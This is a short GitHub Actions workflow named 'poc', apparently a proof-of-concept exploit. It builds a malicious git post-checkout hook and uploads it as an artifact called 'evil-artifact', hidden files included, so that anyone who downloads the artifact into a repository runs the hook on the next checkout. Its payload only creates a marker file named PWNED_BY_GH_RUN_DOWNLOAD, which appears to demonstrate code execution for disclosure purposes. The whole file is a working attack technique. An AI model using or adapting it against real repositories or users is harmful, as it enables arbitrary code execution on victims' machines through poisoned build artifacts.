name: poc
on: workflow_dispatch
jobs:
  build:
    runs-on: ubuntu-latest
    permissions: {}
    steps:
      - run: |
          mkdir -p .git/hooks
          rm -f .git/hooks/*.sample
          printf '#!/bin/sh\ntouch "$PWD/PWNED_BY_GH_RUN_DOWNLOAD"\n' > .git/hooks/post-checkout
          chmod 755 .git/hooks/post-checkout
      - uses: actions/upload-artifact@v4
        with:
          name: evil-artifact
          path: .git/hooks
          include-hidden-files: true
